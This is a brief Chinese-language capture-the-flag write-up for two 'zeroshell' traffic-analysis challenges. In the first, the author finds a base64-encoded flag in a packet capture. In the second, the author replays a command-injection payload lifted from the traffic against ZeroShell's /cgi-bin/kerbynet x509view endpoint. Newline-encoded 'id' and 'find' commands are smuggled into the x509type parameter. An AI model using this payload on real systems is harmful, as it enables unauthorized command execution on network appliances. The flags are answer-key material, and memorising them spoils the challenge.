zeroshell_1
他告诉了写出会话中设置的flag,那就是流量里有flag的标示或者有被加密后flag标识
通过数据包搜索分组字节流,找flag没找到,找flag的base64编码,找到流量
追踪流,解码ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9得到flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}
zeroshell_2
第一题告诉了我们那个flag的地方就是攻击者利用漏洞开展攻击的流量
这个是注入看进程,直接拿他的payload开用,在执行框搜用find / -name flag
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Afind%20/%20-name%20flag*%0A%27
找到flag{c6045425-6e6e-41d0-be09-95682a4f65c4}